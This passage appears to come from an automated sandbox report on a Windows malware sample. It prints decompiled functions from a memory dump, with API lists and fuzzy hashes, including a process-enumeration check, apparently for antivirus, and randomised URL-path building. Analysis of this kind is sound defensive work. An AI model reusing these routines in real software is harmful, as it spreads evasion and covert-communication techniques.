                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E0463A71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E0463A734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E04635646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}
















                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04639259
                                                          • SetEvent.KERNEL32(?), ref: 04639269
                                                          • GetLastError.KERNEL32 ref: 046392F2
                                                            • Part of subcall function 04635646: WaitForMultipleObjects.KERNEL32(00000002,0463A8E3,00000000,0463A8E3,?,?,?,0463A8E3,0000EA60), ref: 04635661
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04639327
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: f9cfc0b01253cf8ed240c10d1b73f85d07997348e1d24e41fc4fd88658262550
                                                          • Instruction ID: 43b81035d6feedb76e2b56e6a042ab1de0be2cb9a41cba7541f786d71e11f9e6
                                                          • Opcode Fuzzy Hash: f9cfc0b01253cf8ed240c10d1b73f85d07997348e1d24e41fc4fd88658262550
                                                          • Instruction Fuzzy Hash: 39312FF5900388EFEB20DFE5CCC499EB7B8EB18305F10496AE542E2250E775EA499F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E046336B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E04633BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E04634F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E0463A2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x463d2ac, 1, 0,  *0x463d344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E0463A446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E0463853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E04634F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E046311EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}













                                                          APIs
                                                          • CreateEventA.KERNEL32(0463D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,046352AA,?,00000001,?), ref: 04633702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,046352AA,?,00000001,?,00000002,?,?,04635D5E,?), ref: 0463370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,046352AA,?,00000001,?,00000002,?,?,04635D5E,?), ref: 0463371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,046352AA,?,00000001,?,00000002,?,?,04635D5E,?), ref: 04633721
                                                            • Part of subcall function 0463A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04633741,?,04633741,?,?,?,?,?,04633741,?), ref: 0463A520
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 92d4023ce107ebdf6f9ac91fae78b80e1a3c7fdaeb40cb187a3eae9cf5455d26
                                                          • Instruction ID: c2462a4ceb341291d6edca98e5c126b7736dc0eb7610d697f17fa7c02b1e1fe6
                                                          • Opcode Fuzzy Hash: 92d4023ce107ebdf6f9ac91fae78b80e1a3c7fdaeb40cb187a3eae9cf5455d26
                                                          • Instruction Fuzzy Hash: A92198B39002D5ABDB10BFE488C48EEB7B9DB54356B054429FE11E7300F735B9858BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E04636545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0;
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E0463A71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 717015bc3a35b1aa29fe133cdd5d4f65637c5fdb136e5b8fe84053b5ed0b5ea6
                                                          • Instruction ID: 52cdea993cec21bb35bb658ff2553b607c8139ff40dcb8039796c09b1ed190b1
                                                          • Opcode Fuzzy Hash: 717015bc3a35b1aa29fe133cdd5d4f65637c5fdb136e5b8fe84053b5ed0b5ea6
                                                          • Instruction Fuzzy Hash: 31213C75901249FFDB21DFA8C98499EBBB8EF58316B104179E902A7214FB71EE01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E046317E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x463d238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x463d250; // 0x0
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x463d250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}

















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04631C49,00000000,?,?,046320C2,?,04EC95B0), ref: 046317F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04631808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04631C49,00000000,?,?,046320C2,?,04EC95B0), ref: 0463184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0463186D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 815118b1599dcf0a12c8a89eb32d141d3fcc908c994ccd3a47345adb5826a97b
                                                          • Instruction ID: ac02769aaaecc6fd7e0ccf3ca83dd81efe5cb10838c04f10cd539f22cd9dacea
                                                          • Opcode Fuzzy Hash: 815118b1599dcf0a12c8a89eb32d141d3fcc908c994ccd3a47345adb5826a97b
                                                          • Instruction Fuzzy Hash: AB11C672A00194BFD710CF69DC84E9EBBAADF95262F050176F5049B250F7749E0487A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0463486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E0463A71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x463c284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x463c284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}










                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,04EC95AC,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 04634889
                                                          • StrTrimA.SHLWAPI(?,0463C284,00000002,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 046348A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 046348B3
                                                          • StrTrimA.SHLWAPI(00000001,0463C284,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 046348C5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: bc3dc1504e08e21ac3ca7bd62988532468057250685785fab40b892a8e24d1dc
                                                          • Instruction ID: 0c07364afc4830facfd53ff44a71636f169af76a302395099a0c63b32b44da52
                                                          • Opcode Fuzzy Hash: bc3dc1504e08e21ac3ca7bd62988532468057250685785fab40b892a8e24d1dc
                                                          • Instruction Fuzzy Hash: 4801B5726053D19BD3219F699C48E27FB98EB55A96F111518F941D7340FF70EC0296A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E0463A65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x463d2a8; // 0x88a5a8
                                                          						_t2 = _t9 + 0x463ee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x463d0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}









                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0463A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0463A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0463A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0463A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: f87be5c3df30c023ad308eb69fbb38018cc68beddad561821823499972e26152
                                                          • Instruction ID: 012e860bd83220e01d77f95e3b3ca8e77024d4320cdd311b0a8ea553283d922f
                                                          • Opcode Fuzzy Hash: f87be5c3df30c023ad308eb69fbb38018cc68beddad561821823499972e26152
                                                          • Instruction Fuzzy Hash: 5BF0F0327011A46AEB20AAA29C48DEB76ACDB86213F000261F945C2200FA34EE4686B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04636840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}






                                                          APIs
                                                          • memset.NTDLL ref: 0463684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04636863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04636870
                                                          • CloseHandle.KERNEL32(?), ref: 04636882
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 5b99046eb16d853e76155978749fdf92210ab05e767bc672fdf4df7359b29313
                                                          • Instruction ID: 8cb208e506f1f8585895b8c7f893dda5c39f3bfd9fd3cc1a909d9a3f7369aa52
                                                          • Opcode Fuzzy Hash: 5b99046eb16d853e76155978749fdf92210ab05e767bc672fdf4df7359b29313
                                                          • Instruction Fuzzy Hash: DBF089F210434C7FD3206F26DCC4C27BBACEB6519EB114E2DF14292111E676BC094A70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04631B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x463d26c; // 0x324
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x463d2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x463d26c; // 0x324
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x463d238; // 0x4ad0000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}








                                                          APIs
                                                          • SetEvent.KERNEL32(00000324,00000001,04634F0E), ref: 04631B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04631B5C
                                                          • CloseHandle.KERNEL32(00000324), ref: 04631B7D
                                                          • HeapDestroy.KERNEL32(04AD0000), ref: 04631B8D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 980c6cf383e99f20c16dd44f1e6f90f71143871b05655d6637a5125f1164c446
                                                          • Instruction ID: 6956bf83e9448e55e0ec7aae9d98f7b4ce9f2533b47e8545bce7ff3480f46818
                                                          • Opcode Fuzzy Hash: 980c6cf383e99f20c16dd44f1e6f90f71143871b05655d6637a5125f1164c446
                                                          • Instruction Fuzzy Hash: A6F03072A013D197EB109B35E848E963B98EB25763B081250B906E7380FB79EC409660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E046323F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x463d32c; // 0x4ec95b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x463d32c; // 0x4ec95b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x463d030) {
                                                          					HeapFree( *0x463d238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E0463486F(_v0, _t14);
                                                          				_t11 =  *0x463d32c; // 0x4ec95b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 046323FD
                                                          • Sleep.KERNEL32(0000000A,?,04635D25), ref: 04632407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04635D25), ref: 0463242F
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 0463244B
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: d3f12c047df9db8bd082819b42e0d803ec9ee6935007a037eb3a28902d80deef
                                                          • Instruction ID: 4974db7e8449ae0cc2aca351bbe802f47a26118971b117e919645488f72fafb9
                                                          • Opcode Fuzzy Hash: d3f12c047df9db8bd082819b42e0d803ec9ee6935007a037eb3a28902d80deef
                                                          • Instruction Fuzzy Hash: BCF0D4726002C09BE7109F68ED58F16B7E4EB29747F049444F641E7251F739EC51CA25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E04636702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x463d32c; // 0x4ec95b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x463d32c; // 0x4ec95b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x463d32c; // 0x4ec95b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x463e81a) {
                                                          					HeapFree( *0x463d238, 0, _t10);
                                                          					_t7 =  *0x463d32c; // 0x4ec95b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 0463670B
                                                          • Sleep.KERNEL32(0000000A,?,04635D25), ref: 04636715
                                                          • HeapFree.KERNEL32(00000000,?,?,04635D25), ref: 04636743
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 04636758
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 5c09665c6237fae85aa5546fc95c58704ebc6860425c7aa0ed15b178c2f65738
                                                          • Instruction ID: 2911a86ba3093720bd9df5986a2fb5b562af29e5e841e268d29b7841cde80ebd
                                                          • Opcode Fuzzy Hash: 5c09665c6237fae85aa5546fc95c58704ebc6860425c7aa0ed15b178c2f65738
                                                          • Instruction Fuzzy Hash: 7DF0D475A002C0ABF7288F64D999F1577F5EB19707B44A009F902E7360F77AEC00CA20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04635AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E0463A71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E0463A71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E0463A734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E0463A782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E0463A782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
